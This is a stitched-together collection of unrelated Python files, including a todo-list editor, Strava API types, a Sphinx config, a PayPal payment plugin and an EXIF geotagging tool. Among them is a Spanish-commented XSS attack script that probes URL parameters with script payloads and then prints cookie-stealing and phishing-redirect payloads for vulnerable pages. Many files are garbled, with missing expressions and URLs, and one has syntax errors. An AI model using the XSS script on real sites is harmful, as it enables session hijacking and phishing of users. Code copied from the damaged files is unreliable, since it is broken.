len(lines): lines.append(line) line = "" for l in lines: line += l.rstrip('\\\n').strip() line = linestrip(line) start = 0 columns = [] for m_obj in literal_re.finditer(line): if not eligible("literal")): continue start = m_obj.start("literal") wrapper = find_allowed_wrapper(line, start, m_obj.end("literal")) if 0 < len(wrapper): continue columns.append(start) if len(columns): mismatches.append((lineno, columns, dump(lines, line), line)) lines = [] cnt = len(mismatches) if cnt: for linenum, cols, linedump, complete_line in mismatches: columns = ','.join([ str(c) for c in cols ]) print "ERROR: Untranslated literal in %s:%d" % (source, linenum) print " ", linedump if 0 < skip_flag: print >> sys.stderr, "Unmatched START_IGNORE_LITERALS in %s:%d" \ % (source, skip_flag) return cnt def pathgen(path): for dp, dlist, flist in os.walk(path): for src in [ f for f in flist if src_re.match(f) ]: yield os.path.join(dp, src) raise StopIteration if len(sys.argv) < 2: print "\nUsage: %s <src1> [<src2>..<srcN>]" % sys.argv[0] print """\ The script checks source files for bare literals which do not appear as arguments for a set of special macros and functions To exclude parts of source file from checking, enclose it between // START_IGNORE_LITERALS line and // STOP_IGNORE_LITERALS line. Currently all macro and function names that match the regular expression %s exclude its bare literal arguments from being reported by this script """ % allowed_re.pattern def check(src): if not src_re.match(src): return if not os.path.exists(src): print >> sys.stderr, "Source file '%s' does not exist" % src sys.exit(-1) start = cnt = do_check(src) print "\nStart checking translation of literals ..." file_count = 0 for src in sys.argv[1:]: if '@' == src[0]: for srcfile in file(src[1:], "r").read().strip().split(): check(srcfile) file_count += 1 elif os.path.isdir(src): for path in pathgen(src): check(path) file_count += 1 else: check(src) file_count += 1 print "End checking translation of literals. ", file_count, "file(s) checked\n"
"""All Error Types pertaining to Enrollment.""" class CourseEnrollmentError(Exception): """Generic Course Enrollment Error. Describes any error that may occur when reading or updating enrollment information for a user or a course. """ def __init__(self, msg, data=None): super().__init__(msg) # Corresponding information to help resolve the error. = data class UserNotFoundError(CourseEnrollmentError): pass class CourseEnrollmentClosedError(CourseEnrollmentError): pass class CourseEnrollmentFullError(CourseEnrollmentError): pass class CourseEnrollmentExistsError(CourseEnrollmentError): # lint-amnesty, pylint: disable=missing-class-docstring enrollment = None def __init__(self, message, enrollment): super().__init__(message) self.enrollment = enrollment class CourseModeNotFoundError(CourseEnrollmentError): """The requested course mode could not be found.""" pass # lint-amnesty, pylint: disable=unnecessary-pass class EnrollmentNotFoundError(CourseEnrollmentError): """The requested enrollment could not be found.""" pass # lint-amnesty, pylint: disable=unnecessary-pass class EnrollmentApiLoadError(CourseEnrollmentError): """The data API could not be loaded.""" pass # lint-amnesty, pylint: disable=unnecessary-pass class InvalidEnrollmentAttribute(CourseEnrollmentError): """Enrollment Attributes could not be validated""" pass # lint-amnesty, pylint: disable=unnecessary-pass
from bs4 import BeautifulSoup import urllib import sys import time ''' Ejemplos -- ''' exploits = ['<script>a=document.cookie;alert(a)</script>', '<IMG+"""><SCRIPT>alert(document.cookie)<%2FSCRIPT>'] # PayloadCode=['var a=document.cookie;var ifr = document.createElement("iframe");ifr.src = ""+a;'+ 'document.body.appendChild(ifr);document.getElementsByTagName("iframe")[0].setAttribute("width", "0px");', 'window.location="";'] Payload = ['<script>'+PayloadCode[0]+'</script>', '<IMG+"""><SCRIPT>'+PayloadCode[0]+'<%2FSCRIPT>'] PayloadPhish = ['<script>'+PayloadCode[1]+'</script>', '<IMG+"""><SCRIPT>'+PayloadCode[1]+'<%2FSCRIPT>'] def ConverUrl(array): url="" array.pop() for x in array: url=url+x+"=" return url url = [x for x in sys.argv[1:]] url=[ConverUrl(x.split("=")) for x in url] def exploit(url): if len(url)!=0: ganador=False index_pay=0 for targets in url: for exp in exploits: newtarget=targets + exp print "Nuevo Target" print newtarget contents = urllib.urlopen(newtarget).read() print "/////////////////////////////" bs = BeautifulSoup(contents,"lxml") #print bs.__dict__ #print type(bs.find_all('script')) scripts=bs.find_all('script') for src in scripts: if src.text.find('alert(')==0: print "**************" print 'WINNER LA PAGINA WEB ES VULNERABLE XD' print src index_pay = exploits.index(exp) ganador=True break if ganador: tipo=raw_input("Desea hacer phishing (p) o robo de sesiones (s)") print "**************" time.sleep(1) print "PAYLOAD PARA LA WEB" if tipo=='s': print targets+Payload[index_pay] elif tipo=='p': print targets+PayloadPhish[index_pay] exploit(url)
#! /usr/env/python3 import time as t import Bolenler """ Kullanicidan alinan bir sayinin basamaklari ile yazilabilecek tum asal sayilarin adedini ekrana yazdiran fonksiyon M() olsun. __ORNEK:__ M(127): | 2 | 7 | 17 | 71 | 127 | 271 | = 6 __CIKTI:__ 100.000'e kadar olan sayilar icinde M() fonksiyonundan en buyuk sayiyi donduren sayi kactir? ----------------------------------------------------------------------- Sayi olarak bakmak yerine string olarak bakmaliyim. *** ba = t.time() x = Bolenler().asalSayilar(9999) k = [] for i in x: li = [j for j in str(i)] li.sort() k.append(li) foo = 0 for foo in range(9999): li2 = [j for j in str(foo)] li2.sort() temp=x.count(li2) print(li2) print(temp) bi=t.time() print(bi-ba) *** """ asallar = Bolenler.asalSayilar(100000) for i in asallar def m(sayi: int) -> None: parcaliListe = [] if (len(str(sayi))==1) for i in asallar: parcalar = [j for j in str(i)] parcalar.sort() parcaliListe.append(parcalar) sure1 = t.time() # Baslangic zamani for i in range(99999): m(i) sure2 = t.time() # Bitis zamani print(sure2-sure1)
# Topydo - A todo.txt client written in Python. # Copyright (C) 2014 Bram Schoenmakers <> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <>. import os from subprocess import call, check_call, CalledProcessError import tempfile from topydo.lib.ListCommand import ListCommand from topydo.lib.MultiCommand import MultiCommand from topydo.lib.Config import config from topydo.lib.Todo import Todo from topydo.lib.TodoListBase import InvalidTodoException from topydo.lib.TodoList import TodoList from topydo.lib.PrettyPrinterFilter import PrettyPrinterNumbers class EditCommand(MultiCommand, ListCommand): def __init__(self, p_args, p_todolist, p_output, p_error, p_input): super(EditCommand, self).__init__(p_args, p_todolist, p_output, p_error, p_input) self.is_expression = False self.edit_archive = False def _process_flags(self): opts, args = self.getopt('xed') for opt, value in opts: if opt == '-d': self.edit_archive = True elif opt == '-x': self.show_all = True elif opt == '-e': self.is_expression = True self.args = args def _todos_to_temp(self): f = tempfile.NamedTemporaryFile() for todo in self.todos: f.write("%s\n" % todo.__str__()) return f def _todos_from_temp(self, temp_file): todos = todo_objs = [] for todo in todos: todo_objs.append(Todo(todo)) return todo_objs def _open_in_editor(self, temp_file, editor): try: return check_call([editor,]) except(CalledProcessError): self.error('Something went wrong in the editor...') return 1 def _catch_todo_errors(self): errors = [] if len(self.invalid_numbers) > 1 or len(self.invalid_numbers) > 0 and len(self.todos) > 0: for number in self.invalid_numbers: errors.append("Invalid todo number given: {}.".format(number)) elif len(self.invalid_numbers) == 1 and len(self.todos) == 0: errors.append("Invalid todo number given.") if len(errors) > 0: return errors else: return None def execute(self): if not super(ListCommand, self).execute(): return False self.printer.add_filter(PrettyPrinterNumbers(self.todolist)) try: editor = os.environ['EDITOR'] or 'vi' except(KeyError): editor = 'vi' try: if len(self.args) < 1: todo = config().todotxt() return call([editor, todo]) == 0 else: self._process_flags() if self.edit_archive: archive = config().archive() return call([editor, archive]) == 0 if self.is_expression: self.todos = self._view()._viewdata else: self.get_todos(self.args) todo_errors = self._catch_todo_errors() if not todo_errors: temp_todos = self._todos_to_temp() if not self._open_in_editor(temp_todos, editor): new_todos = self._todos_from_temp(temp_todos) if len(new_todos) == len(self.todos): for todo in self.todos: super(TodoList, self.todolist).delete(todo) for todo in new_todos: self.todolist.add_todo(todo) self.out(self.printer.print_todo(todo)) else: self.error('Number of edited todos is not equal to ' 'number of supplied todo IDs.') else: self.error(self.usage()) else: for error in todo_errors: self.error(error) except(OSError): self.error('There is no such editor as: ' + editor + '. ' 'Check your $EDITOR and/or $PATH') def usage(self): return """Synopsis: edit edit <NUMBER1> [<NUMBER2> ...] edit -e [-x] [expression] edit -d""" def help(self): return """\ Launches a text editor to edit todos. Without any arguments it will just open the todo.txt file. Alternatively it can edit todo item(s) with the given number(s) or edit relevant todos matching the given expression. See `topydo help ls` for more information on relevant todo items. It is also possible to open the archive file. By default it will use $EDITOR in your environment, otherwise it will fall back to 'vi'. -e : Treat the subsequent arguments as an expression. -x : Edit *all* todos matching the expression (i.e. do not filter on dependencies or relevance). -d : Open the archive file. """
""" Attribute types used for the model. The types system provides a mechanism for serializing/un the data to/from JSON structures and for capturing additional information about the model attributes. """ from __future__ import division, absolute_import, print_function, unicode_literals import logging from datetime import datetime, timedelta, tzinfo, date from collections import namedtuple from weakref import WeakKeyDictionary, WeakValueDictionary import arrow import pytz from units.quantity import Quantity import six import stravalib.model # Depending on the type of request, objects will be returned in meta, summary or detailed representations. The # representation of the returned object is indicated by the resource_state attribute. # (For more info, see META = 1 SUMMARY = 2 DETAILED = 3 class Attribute(object): """ Base descriptor class for a Strava model attribute. """ _type = None def __init__(self, type_, resource_states=None, units=None): self.log = logging.getLogger('{0.__module__}.{0.__name__}'.format(self.__class__)) self.type = type_ self.resource_states = resource_states = WeakKeyDictionary() self.units = units def __get__(self, obj, clazz): if obj is not None: # It is being called on an object (not class) # This can cause infinite loops, when we're attempting to get the resource_state attribute ... #if hasattr(clazz, 'resource_state') \ # and obj.resource_state is not None \ # and not obj.resource_state in self.resource_states: # raise AttributeError("attribute required resource state not satisfied by object") return else: # Rather than return the wrapped value, return the actual descriptor object return self def __set__(self, obj, val): if val is not None:[obj] = self.unmarshal(val) else:[obj] = None @property def type(self): return self._type @type.setter def type(self, v): self._type = v def marshal(self, v): """ Turn this value into format for wire (JSON). (By default this will just return the underlying object; subclasses can override for specific behaviors -- e.g. date formatting.) """ if isinstance(v, Quantity): return v.num else: return v def unmarshal(self, v): """ Convert the value from parsed JSON structure to native python representation. By default this will leave the value as-is since the JSON parsing routines typically convert to native types. The exception may be date strings or other more complex types, where subclasses will override this behavior. """ if self.units: # Note that we don't want to cast to type in this case! if not isinstance(v, Quantity): v = self.units(v) elif not isinstance(v, self.type): v = self.type(v) return v class DateAttribute(Attribute): """ """ def __init__(self, resource_states=None): super(DateAttribute, self).__init__(date, resource_states=resource_states) def marshal(self, v): """ :param v: The date object to convert. :type v: date :return: """ return v.isoformat() if v else None def unmarshal(self, v): """ Convert a date in "2012-12-13" format to a :class:`` object. """ if not isinstance(v, date): # 2012-12-13 v = datetime.strptime(v, "%Y-%m-%d").date() return v class TimestampAttribute(Attribute): """ """ def __init__(self, resource_states=None, tzinfo=pytz.utc): super(TimestampAttribute, self).__init__(datetime, resource_states=resource_states) self.tzinfo = tzinfo def marshal(self, v): """ Serialize the timestamp to string. :param v: The timestamp. :type v: datetime :return: The serialized date time. """ return v.isoformat() if v else None def unmarshal(self, v): """ Convert a timestamp in "2012-12-13T03:43:19Z" format to a `datetime.datetime` object. """ if not isinstance(v, datetime): if isinstance(v, six.integer_types): v = arrow.get(v) else: try: # Most dates are in this format 2012-12-13T03:43:19Z v = datetime.strptime(v, "%Y-%m-%dT%H:%M:%SZ") except ValueError: # ... but not all. v = arrow.get(v).datetime # Translate to specified TZ v = v.replace(tzinfo=self.tzinfo) return v LatLon = namedtuple('LatLon', ['lat', 'lon']) class LocationAttribute(Attribute): """ """ def __init__(self, resource_states=None): super(LocationAttribute, self).__init__(LatLon, resource_states=resource_states) def marshal(self, v): """ Turn this value into format for wire (JSON). :param v: The lat/lon. :type v: LatLon :return: Serialized format. :rtype: str """ return "{lat},{lon}".format(, lon=v.lon) if v else None def unmarshal(self, v): """ """ if not isinstance(v, LatLon): v = LatLon(lat=v[0], lon=v[1]) return v class TimezoneAttribute(Attribute): """ """ def __init__(self, resource_states=None): super(TimezoneAttribute, self).__init__(pytz.timezone, resource_states=resource_states) def unmarshal(self, v): """ Convert a timestamp in format "(GMT-08:00) America/Los_Angeles" to a `pytz.timestamp` object. """ if not isinstance(v, tzinfo): # (GMT-08:00) America/Los_Angeles tzname = v.split(' ', 1)[1] v = pytz.timezone(tzname) return v def marshal(self, v): """ Serialize time zone name. :param v: The timezone. :type v: tzdata :return: The name of the time zone. """ return str(v) if v else None class TimeIntervalAttribute(Attribute): """ Handles time durations, assumes upstream int value in seconds. """ def __init__(self, resource_states=None): super(TimeIntervalAttribute, self).__init__(int, resource_states=resource_states) def unmarshal(self, v): """ Convert the value from parsed JSON structure to native python representation. By default this will leave the value as-is since the JSON parsing routines typically convert to native types. The exception may be date strings or other more complex types, where subclasses will override this behavior. """ if not isinstance(v, timedelta): v = timedelta(seconds=v) return v def marshal(self, v): """ Serialize time zone name. :param v: The timezone. :type v: tzdata :return: The name of the time zone. """ return str(v) if v else None class ChoicesAttribute(Attribute): """ Attribute where there are several choices the attribute may take. Allows conversion from the API value to a more helpful python value. """ def __init__(self, *args, **kwargs): self.choices = kwargs.pop("choices", {}) super(ChoicesAttribute, self).__init__(*args, **kwargs) def marshal(self, v): """ Turn this value into API format. Do a reverse dictionary lookup on choices to find the original value. If there are no keys or too many keys for now we raise a NotImplementedError as marshal is not used anywhere currently. In the future we will want to fail gracefully. """ if v: orig = [i for i in self.choices if self.choices[i] == v] if len(orig) == 1: return orig[0] elif len(orig) == 0: # No such choice raise NotImplementedError("No such reverse choice {0} for field {1}.".format(v, self)) else: # Too many choices. We could return one possible choice (e.g. orig[0]). raise NotImplementedError("Too many reverse choices {0} for value {1} for field {2}".format(orig, v, self)) def unmarshal(self, v): """ Convert the value from Strava API format to useful python representation. If the value does not appear in the choices attribute we log an error rather than raising an exception as this may be caused by a change to the API upstream so we want to fail gracefully. """ try: return self.choices[v] except KeyError: self.log.warning("No such choice {0} for field {1}.".format(v, self)) # Just return the value from the API return v class EntityAttribute(Attribute): """ Attribute for another entity. """ _lazytype = None def __init__(self, *args, **kwargs): super(EntityAttribute, self).__init__(*args, **kwargs) self.bind_clients = WeakKeyDictionary() @property def type(self): if self._lazytype: clazz = getattr(stravalib.model, self._lazytype) else: clazz = self._type return clazz @type.setter def type(self, v): if isinstance(v, (six.text_type, six.binary_type)): # Supporting lazy class referencing self._lazytype = v else: self._type = v def __set__(self, obj, val): if val is not None: # If the "owning" object has a bind_client set, we want to pass that # down into the objects we are deserializing here[obj] = self.unmarshal(val, bind_client=getattr(obj, 'bind_client', None)) else:[obj] = None def marshal(self, v): """ Turn an entity into a dictionary. :param v: The entity to serialize. :type v: stravalib.model.BaseEntity :return: Dictionary of attributes :rtype: Dict[str, Any] """ return v.to_dict() if v else None def unmarshal(self, value, bind_client=None): """ Cast the specified value to the entity type. """ #self.log.debug("Unmarshall {0!r}: {1!r}".format(self, value)) if not isinstance(value, self.type): o = self.type() if bind_client is not None and hasattr(o.__class__, 'bind_client'): o.bind_client = bind_client if isinstance(value, dict): for (k, v) in value.items(): if not hasattr(o.__class__, k): self.log.warning("Unable to set attribute {0} on entity {1!r}".format(k, o)) else: #self.log.debug("Setting attribute {0} on entity {1!r}".format(k, o)) setattr(o, k, v) value = o else: raise Exception("Unable to unmarshall object {0!r}".format(value)) return value class EntityCollection(EntityAttribute): def marshal(self, values): """ Turn a list of entities into a list of dictionaries. :param values: The entities to serialize. :type values: List[stravalib.model.BaseEntity] :return: List of dictionaries of attributes :rtype: List[Dict[str, Any]] """ if values is not None: return [super(EntityCollection, self).marshal(v) for v in values] def unmarshal(self, values, bind_client=None): """ Cast the list. """ if values is not None: return [super(EntityCollection, self).unmarshal(v, bind_client=bind_client) for v in values]
# -*- coding: utf-8 -*- # # TempoIQ Manual documentation build configuration file # import sys import os # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.append(os.path.abspath('sphinxext')) # -- General configuration ------------------------------------------------ html_context = { # Github info for generating source links in documents 'gh_repository': 'TempoIQ/docs', 'gh_branch': 'master', 'display_github': True } # For development builds, invoke sphinx-build with '-t dev'. if not tags.has('dev'): tags.add('publish') html_context['publish'] = True # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [ 'sphinx.ext.todo', 'tempoiq_sphinx', 'snippets', 'redirect' ] # List of valid snippet languages. snippet_language_list = [ { 'key': 'python', 'name': 'Python', 'local_file': 'includes/', #'gh_repository': 'TempoIQ/tempoiq-python', #'gh_branch': 'master', #'gh_path': 'tests/', 'line_comment': '#' }, { 'key': 'node', 'name': 'Node.js', 'highlight': 'javascript', 'gh_repository': 'TempoIQ/tempoiq-node-js', 'gh_branch': 'master', 'gh_path': 'test/test_snippets.js', 'line_comment': '//' }, { 'key': 'ruby', 'name': 'Ruby', 'local_file': 'includes/ruby_snippets.rb', 'line_comment': '#' }, { 'key': 'java', 'name': 'Java', 'gh_repository': 'TempoIQ/tempoiq-java', 'gh_branch': 'master', 'gh_path': 'src/integration-test/java/com/tempoiq/', 'line_comment': '//' }, { 'key': 'csharp', 'name': 'C#/.NET', 'local_file': 'includes/csharp_snippets.cs', 'line_comment': '//' }, { 'key': 'http', 'name': 'HTTP', 'highlight': 'bash', 'line_comment': '#', 'local_file': 'includes/http_snippets.txt' } ] # Name of the default domain. primary_domain = 'tempoiq' # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The master toctree document. master_doc = 'toc-main' # A list of (type, target) tuples (by default empty) that should be ignored # when generating warnings in “nitpicky mode” nitpick_ignore = [ ('tempoiq:class', 'String') ] # General information about the project. project = u'Documentation' copyright = u'2015 TempoIQ Inc' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '1.0' # The full version, including alpha/beta/rc tags. release = '1.0' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['includes/*'] # Include TODO directives in the output. Turn off for publishing in prod if tags.has('dev'): todo_include_todos = True # If true, '()' will be appended to :func: etc. cross-reference text. add_function_parentheses = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # Default language for syntax highlighting highlight_language = 'javascript' # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'tempoiq_theme' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. html_theme_path = ["themes"] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". html_title = "TempoIQ documentation" # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y'
import glob import json import zipfile import tarfile import os import sys import arrow def main(): data_dir = 'data/' infos = [] for info_filename in glob.glob(data_dir + '/*/info.json'): with open(info_filename) as file: info = json.loads( info['date'] = arrow.get(info['date']) infos.append(info) infos = sorted(infos, key=lambda d:d['date']) out_write = sys.stdout.write def out_bwrite(data): sys.stdout.flush() sys.stdout.buffer.write(data) sys.stdout.flush() for info in infos: dirname = os.path.join(data_dir, info['slug']) for filename in glob.glob(dirname + '/*src*'): archive_filename = filename break else: raise Exception('Cannot find archive file.') sys.stderr.write('=== {}\n'.format(info['slug'])) def get_files(): if archive_filename.endswith('zip'): file = zipfile.ZipFile(archive_filename) for name in file.namelist(): if name.startswith('areca-'): fixed_name = name.split('/', 1)[-1].replace('//', '/') else: fixed_name = name if not name.endswith('/'): yield fixed_name, else: file = for name in file.getnames(): try: yield name, file.extractfile(name).read() except AttributeError: # Not a file pass out_write('commit refs/heads/master\n') out_write('committer Areca Backup <> {} +0000\n'.format(info['date'].timestamp)) commit_message = 'Release {}'.format(info['slug']).encode() out_write('data {}\n'.format(len(commit_message))) out_bwrite(commit_message) out_write('\n') out_write('deleteall\n') for filename, data in get_files(): out_write('M 644 inline {}\n'.format(filename)) out_write('data {}\n'.format(len(data))) out_bwrite(data) out_write('\n') out_write('\n') if __name__ == '__main__': main()
import json import logging from collections import OrderedDict import paypalrestsdk from django import forms from django.contrib import messages from django.template.loader import get_template from django.utils.translation import ugettext as __, ugettext_lazy as _ from pretix.base.models import Quota from pretix.base.payment import BasePaymentProvider from import mark_order_paid from pretix.helpers.urls import build_absolute_uri logger = logging.getLogger('pretix.plugins.paypal') class Paypal(BasePaymentProvider): identifier = 'paypal' verbose_name = _('PayPal') payment_form_fields = OrderedDict([ ]) @property def settings_form_fields(self): return OrderedDict( list(super().settings_form_fields.items()) + [ ('endpoint', forms.ChoiceField( label=_('Endpoint'), initial='live', choices=( ('live', 'Live'), ('sandbox', 'Sandbox'), ), )), ('client_id', forms.CharField( label=_('Client ID'), )), ('secret', forms.CharField( label=_('Secret'), )) ] ) def init_api(self): paypalrestsdk.set_config( mode="sandbox" if "sandbox" in self.settings.get('endpoint') else 'live', client_id=self.settings.get('client_id'), client_secret=self.settings.get('secret')) def payment_is_valid_session(self, request): return (request.session.get('payment_paypal_id', '') != '' and request.session.get('payment_paypal_payer', '') != '') def payment_form_render(self, request) -> str: template = get_template('pretixplugins/paypal/checkout_payment_form.html') ctx = {'request': request, 'event': self.event, 'settings': self.settings} return template.render(ctx) def checkout_prepare(self, request, cart): self.init_api() items = [] for cp in cart['positions']: items.append({ "name":, "description": str(cp.variation) if cp.variation else "", "quantity": cp.count, "price": str(cp.price), "currency": request.event.currency }) if cart['payment_fee']: items.append({ "name": __('Payment method fee'), "description": "", "quantity": 1, "currency": request.event.currency, "price": str(cart['payment_fee']) }) payment = paypalrestsdk.Payment({ 'intent': 'sale', 'payer': { "payment_method": "paypal", }, "redirect_urls": { "return_url": build_absolute_uri('plugins:paypal:return'), "cancel_url": build_absolute_uri('plugins:paypal:abort'), }, "transactions": [ { "item_list": { "items": items }, "amount": { "currency": request.event.currency, "total": str(cart['total']) }, "description": __('Event tickets for %s') % } ] }) return self._create_payment(request, payment) def _create_payment(self, request, payment): try: if payment.create(): if payment.state not in ('created', 'approved', 'pending'): messages.error(request, _('We had trouble communicating with PayPal')) logger.error('Invalid payment state: ' + str(payment)) return request.session['payment_paypal_id'] = request.session['payment_paypal_event'] = for link in payment.links: if link.method == "REDIRECT" and link.rel == "approval_url": return str(link.href) else: messages.error(request, _('We had trouble communicating with PayPal')) logger.error('Error on creating payment: ' + str(payment.error)) except Exception as e: messages.error(request, _('We had trouble communicating with PayPal')) logger.error('Error on creating payment: ' + str(e)) def checkout_confirm_render(self, request) -> str: """ Returns the HTML that should be displayed when the user selected this provider on the 'confirm order' page. """ template = get_template('pretixplugins/paypal/checkout_payment_confirm.html') ctx = {'request': request, 'event': self.event, 'settings': self.settings} return template.render(ctx) def payment_perform(self, request, order) -> str: """ Will be called if the user submitted his order successfully to initiate the payment process. It should return a custom redirct URL, if you need special behaviour, or None to continue with default behaviour. On errors, it should use Django's message framework to display an error message to the user (or the normal form validation error messages). :param order: The order object """ if (request.session.get('payment_paypal_id', '') == '' or request.session.get('payment_paypal_payer', '') == ''): messages.error(request, _('We were unable to process your payment. See below for details on how to ' 'proceed.')) self.init_api() payment = paypalrestsdk.Payment.find(request.session.get('payment_paypal_id')) if str(payment.transactions[0] != str( or payment.transactions[0].amount.currency != \ self.event.currency: messages.error(request, _('We were unable to process your payment. See below for details on how to ' 'proceed.')) logger.error('Value mismatch: Order %s vs payment %s' % (, str(payment))) return return self._execute_payment(payment, request, order) def _execute_payment(self, payment, request, order): payment.execute({"payer_id": request.session.get('payment_paypal_payer')}) if payment.state == 'pending': messages.warning(request, _('PayPal has not yet approved the payment. We will inform you as soon as the ' 'payment completed.')) order = order.clone() order.payment_info = json.dumps(payment.to_dict()) return if payment.state != 'approved': messages.error(request, _('We were unable to process your payment. See below for details on how to ' 'proceed.')) logger.error('Invalid state: %s' % str(payment)) return try: mark_order_paid(order, 'paypal', json.dumps(payment.to_dict())) messages.success(request, _('We successfully received your payment. Thank you!')) except Quota.QuotaExceededException as e: messages.error(request, str(e)) return None def order_pending_render(self, request, order) -> str: retry = True try: if order.payment_info and json.loads(order.payment_info)['state'] != 'pending': retry = False except KeyError: pass template = get_template('pretixplugins/paypal/pending.html') ctx = {'request': request, 'event': self.event, 'settings': self.settings, 'retry': retry, 'order': order} return template.render(ctx) def order_control_render(self, request, order) -> str: if order.payment_info: payment_info = json.loads(order.payment_info) else: payment_info = None template = get_template('pretixplugins/paypal/control.html') ctx = {'request': request, 'event': self.event, 'settings': self.settings, 'payment_info': payment_info, 'order': order} return template.render(ctx) def order_control_refund_render(self, order) -> str: return '<div class="alert alert-info">%s</div>' % _('The money will be automatically refunded.') def order_control_refund_perform(self, request, order) -> "bool|str": self.init_api() if order.payment_info: payment_info = json.loads(order.payment_info) else: payment_info = None if not payment_info: order.mark_refunded() messages.warning(request, _('We were unable to transfer the money back automatically. ' 'Please get in touch with the customer and transfer it back manually.')) return for res in payment_info['transactions'][0]['related_resources']: for k, v in res.items(): if k == 'sale': sale = paypalrestsdk.Sale.find(v['id']) break refund = sale.refund({}) if not refund.success(): order.mark_refunded() messages.warning(request, _('We were unable to transfer the money back automatically. ' 'Please get in touch with the customer and transfer it back manually.')) else: sale = paypalrestsdk.Payment.find(payment_info['id']) order = order.mark_refunded() order.payment_info = json.dumps(sale.to_dict())
#!/usr/bin/python # -*- encoding: utf-8 -*- """ exif-revgeo ~~~~~~~~~~~ This utility reads the GPS coordinates from your photos, reverse geocode them, and write the result to the appropriate EXIF city/country location tags. :copyright: (c) 2015 by fg1 :license: BSD, see LICENSE for more details """ from __future__ import print_function import os import json import shlex import logging import argparse import requests import subprocess __version__ = "0.1.0" # IPTC tags used for the location EXIF_IPTC_LOC = ['City', 'Country-PrimaryLocationName', 'Country-PrimaryLocationCode'] # Description of the webservice doing the reverse geocoding REVERSE_GEOCODE_URL = '' REVERSE_GEOCODE_TRANS = {u"city": u"City", u"country": u"Country-PrimaryLocationName", u"country_iso3166-3": u"Country-PrimaryLocationCode"} # ---------------------------------------------------------------------------- # Helper functions logging.basicConfig(format='%(asctime)-15s %(message)s') log = logging.getLogger('exifloc') def filter_keys(d, keys): """ Returns dict 'd' with only the keys specified in 'keys' """ return dict((k, v) for k, v in d.iteritems() if k in keys) def exclude_keys(d, keys): """ Returns dict 'd' without the keys specified in 'keys' """ return dict((k, v) for k, v in d.iteritems() if k not in keys) # ---------------------------------------------------------------------------- # Reverse geocoding def reverse_geocode(lat, lng): r = requests.get(REVERSE_GEOCODE_URL % {'lat': lat, 'lng': lng}) if r.status_code != 200: return None else: return json.loads(r.text) # ---------------------------------------------------------------------------- # EXIF read/write operations def extract_exif_tags(exiftool_bin, path, rd_args): if isinstance(path, basestring): path = [path] iptc_tags = ['-' + t for t in EXIF_IPTC_LOC] data = subprocess.check_output([exiftool_bin] + shlex.split(rd_args) + shlex.split('-q -n -j -GPSLatitude -GPSLongitude') + iptc_tags + path) data = json.loads(data) return data def tag_location(exiftool_bin, wr_args, info, overwrite_tags, dry_run): rg_loc = reverse_geocode(info['GPSLatitude'], info['GPSLongitude']) if rg_loc == None: log.warn('Error getting info for %(SourceFile)s (%(GPSLatitude)f, %(GPSLongitude)f)', info) return # Adapts the returned object to the IPTC names for k, v in REVERSE_GEOCODE_TRANS.iteritems(): if k not in rg_loc: log.warn('Unable to find "' + k + '" in returned location: ' + str(rg_loc)) return rg_loc[v] = rg_loc.pop(k) rg_loc = filter_keys(rg_loc, EXIF_IPTC_LOC) # Only add tags where they are missing if not overwrite_tags: exif_loc = filter_keys(info, EXIF_IPTC_LOC) rg_loc = exclude_keys(rg_loc, exif_loc.keys()) if len(rg_loc) == 0: return # Build exiftool command cmd = [exiftool_bin] + shlex.split(wr_args) for k, v in rg_loc.iteritems(): cmd.append('-' + k + "=" + v + "") cmd.append(info['SourceFile']) # Execute command print("> " + ' '.join(cmd)) if dry_run: return subprocess.check_call(cmd) # ---------------------------------------------------------------------------- # Main def main(args): tags = extract_exif_tags(args.exiftool_bin, args.path, args.rd_args) # Keeps only the files where the latitude and longitude are set tags = [t for t in tags if 'GPSLatitude' in t and 'GPSLongitude' in t] for t in tags: tag_location(args.exiftool_bin, args.wr_args, t, args.overwrite_tags, args.dry_run) def cli(): parser = argparse.ArgumentParser(description='Add city and country in EXIF based on GPS coords') parser.add_argument('--exiftool-bin', type=str, help='exiftool binary to use', default='exiftool') parser.add_argument('--rd-args', type=str, help='exiftool read arguments', default='') parser.add_argument('--wr-args', type=str, help='exiftool write arguments', default='-overwrite_original') parser.add_argument('-o', '--overwrite-tags', action='store_true', help='Overwrite existing tag values') parser.add_argument('path', type=str, help='files or folder to process') parser.add_argument('-d', '--dry-run', action='store_true', help='Do not perform any file modification') args = parser.parse_args() main(args) if __name__ == "__main__": cli()
